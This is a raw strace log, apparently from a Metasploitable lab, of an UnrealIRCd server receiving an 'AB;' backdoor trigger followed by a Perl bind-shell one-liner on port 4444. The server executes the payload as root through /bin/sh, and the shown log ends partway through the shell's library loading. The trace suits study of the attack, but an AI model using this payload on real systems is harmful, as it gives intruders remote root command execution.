4519  07:23:02.929180 select(1024, [2 3 4 7 9], [], NULL, {0, 900000}) = 1 (in [2], left {0, 710000})

4519  07:23:03.119329 clock_gettime(CLOCK_MONOTONIC, {1792, 936350733}) = 0

4519  07:23:03.119352 accept(2, 0, NULL) = 5

4519  07:23:03.119373 getpeername(5, {sa_family=AF_INET, sin_port=htons(44501), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:23:03.119434 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:23:03.119449 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:23:03.119491 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:23:03.119504 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:23:03.119516 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:23:03.119527 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:23:03.119542 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:23:03.119558 clock_gettime(CLOCK_MONOTONIC, {1792, 936571888}) = 0

4519  07:23:03.119570 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:23:03.119583 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:23:03.119593 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:23:03.119602 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:23:03.119612 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:23:03.119628 send(6, "\225\314\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:23:03.119705 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:23:03.119742 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:23:03.119864 gettimeofday({1495624983, 119870}, NULL) = 0

4519  07:23:03.119879 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:23:03.124263 clock_gettime(CLOCK_MONOTONIC, {1792, 941281935}) = 0

4519  07:23:03.124301 recvfrom(6, "\225\314\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\35\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:23:03.124359 close(6)          = 0

4519  07:23:03.124384 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:23:03.124401 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:23:03.124451 time(NULL)        = 1495624983

4519  07:23:03.124464 time(NULL)        = 1495624983

4519  07:23:03.124515 gettimeofday({1495624983, 124520}, NULL) = 0

4519  07:23:03.124528 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:23:03.124557 clock_gettime(CLOCK_MONOTONIC, {1792, 941570149}) = 0

4519  07:23:03.124568 gettimeofday({1495624983, 124571}, NULL) = 0

4519  07:23:03.124578 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:23:03.124619 clock_gettime(CLOCK_MONOTONIC, {1792, 941631540}) = 0

4519  07:23:03.124630 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:23:03.124659 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:23:03.124680 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:23:03.124692 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:23:03.124707 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 8350

8350  07:23:03.124790 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

8350  07:23:03.124805 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

8350  07:23:03.124816 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8350  07:23:03.124829 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

8350  07:23:03.124989 brk(0)            = 0x80f9000

8350  07:23:03.125013 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8350  07:23:03.125030 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f92000

8350  07:23:03.125048 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

8350  07:23:03.125066 open("/etc/ld.so.cache", O_RDONLY) = 1

8350  07:23:03.125092 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

8350  07:23:03.125111 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8a000

8350  07:23:03.125121 close(1)          = 0

8350  07:23:03.125132 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8350  07:23:03.125148 open("/lib/libncurses.so.5", O_RDONLY) = 1

8350  07:23:03.125162 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

8350  07:23:03.125257 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

8350  07:23:03.125275 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5a000

8350  07:23:03.125287 mmap2(0xb7f87000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f87000

8350  07:23:03.125304 close(1)          = 0

8350  07:23:03.125315 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8350  07:23:03.125329 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

8350  07:23:03.125344 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

8350  07:23:03.125489 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

8350  07:23:03.125508 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f56000

8350  07:23:03.125519 mmap2(0xb7f58000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f58000

8350  07:23:03.125535 close(1)          = 0

8350  07:23:03.125550 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8350  07:23:03.125565 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

8350  07:23:03.125579 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

8350  07:23:03.125669 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

8350  07:23:03.125686 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f55000

8350  07:23:03.125699 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e06000

8350  07:23:03.125710 mmap2(0xb7f4f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f4f000

8350  07:23:03.125725 mmap2(0xb7f52000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f52000

8350  07:23:03.125739 close(1)          = 0

8350  07:23:03.125760 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e05000

8350  07:23:03.125772 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e056b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

8350  07:23:03.125827 mprotect(0xb7f4f000, 4096, PROT_READ) = 0

8350  07:23:03.125863 munmap(0xb7f8a000, 29913) = 0

8350  07:23:03.125889 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8350  07:23:03.125929 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

8350  07:23:03.125951 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa9ec60) = -1 ENOTTY (Inappropriate ioctl for device)

8350  07:23:03.125996 brk(0)            = 0x80f9000

8350  07:23:03.126006 brk(0x80fa000)    = 0x80fa000

8350  07:23:03.126018 brk(0x80fb000)    = 0x80fb000

8350  07:23:03.126034 getuid32()        = 0

8350  07:23:03.126043 getgid32()        = 0

8350  07:23:03.126053 geteuid32()       = 0

8350  07:23:03.126061 getegid32()       = 0

8350  07:23:03.126075 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8350  07:23:03.126089 time(NULL)        = 1495624983

8350  07:23:03.126101 brk(0x80fc000)    = 0x80fc000

8350  07:23:03.126116 brk(0x80fd000)    = 0x80fd000

8350  07:23:03.126135 open("/proc/meminfo", O_RDONLY) = 1

8350  07:23:03.126157 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

8350  07:23:03.126175 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f91000

8350  07:23:03.126187 read(1, "MemTotal:      1035240 kB\nMemFree:        517072 kB\nBuffers:         66032 kB\nCached:         294736 kB\nSwapCached:          0 kB\nActive:         254952 kB\nInactive:       234788 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        516832 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4820 kB\nWriteback:           0 kB\nAnonPages:      128972 kB\nMapped:          52000 kB\nSlab:            17312 kB\nSReclaimable:     9020 kB\nSUnreclaim:       8292 kB\nPageTables:       1992 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

8350  07:23:03.126274 close(1)          = 0

8350  07:23:03.126285 munmap(0xb7f91000, 4096) = 0

8350  07:23:03.126297 brk(0x80fe000)    = 0x80fe000

8350  07:23:03.126323 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

8350  07:23:03.126337 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

8350  07:23:03.126349 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

8350  07:23:03.126361 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

8350  07:23:03.126374 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

8350  07:23:03.126386 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

8350  07:23:03.126421 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8350  07:23:03.126450 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

8350  07:23:03.126464 uname({sys="Linux", node="metasploitable", ...}) = 0

8350  07:23:03.126527 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

8350  07:23:03.126545 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

8350  07:23:03.126564 brk(0x8100000)    = 0x8100000

8350  07:23:03.126576 getcwd("/etc/unreal", 4096) = 12

8350  07:23:03.126591 getpid()          = 8350

8350  07:23:03.126607 getppid()         = 4519

8350  07:23:03.126623 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

8350  07:23:03.126643 stat64("/sbin/sh", 0xbfa9ec38) = -1 ENOENT (No such file or directory)

8350  07:23:03.126656 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

8350  07:23:03.126674 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

8350  07:23:03.126698 socket(PF_FILE, SOCK_STREAM, 0) = 1

8350  07:23:03.126710 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

8350  07:23:03.126723 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

8350  07:23:03.126744 close(1)          = 0

8350  07:23:03.126756 socket(PF_FILE, SOCK_STREAM, 0) = 1

8350  07:23:03.126766 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

8350  07:23:03.126776 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

8350  07:23:03.126794 close(1)          = 0

8350  07:23:03.126807 open("/etc/nsswitch.conf", O_RDONLY) = 1

8350  07:23:03.126822 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

8350  07:23:03.126838 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f91000

8350  07:23:03.126850 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

8350  07:23:03.127499 read(1, "", 4096) = 0

8350  07:23:03.127513 close(1)          = 0

8350  07:23:03.127523 munmap(0xb7f91000, 4096) = 0

8350  07:23:03.127539 open("/etc/ld.so.cache", O_RDONLY) = 1

8350  07:23:03.127553 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

8350  07:23:03.127569 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8a000

8350  07:23:03.127580 close(1)          = 0

8350  07:23:03.127590 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8350  07:23:03.127605 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

8350  07:23:03.127620 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

8350  07:23:03.127714 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

8350  07:23:03.127732 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dfc000

8350  07:23:03.127744 mmap2(0xb7e03000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e03000

8350  07:23:03.127761 close(1)          = 0

8350  07:23:03.127773 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8350  07:23:03.127787 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

8350  07:23:03.127801 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

8350  07:23:03.127889 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

8350  07:23:03.127906 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de4000

8350  07:23:03.127917 mmap2(0xb7df8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7df8000

8350  07:23:03.127932 mmap2(0xb7dfa000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dfa000

8350  07:23:03.127975 close(1)          = 0

8350  07:23:03.128016 munmap(0xb7f8a000, 29913) = 0

8350  07:23:03.128033 open("/etc/ld.so.cache", O_RDONLY) = 1

8350  07:23:03.128046 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

8350  07:23:03.128063 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8a000

8350  07:23:03.128073 close(1)          = 0

8350  07:23:03.128083 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8350  07:23:03.128098 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

8350  07:23:03.128112 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

8350  07:23:03.128206 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

8350  07:23:03.128224 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dda000

8350  07:23:03.128235 mmap2(0xb7de2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7de2000

8350  07:23:03.128251 close(1)          = 0

8350  07:23:03.128263 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

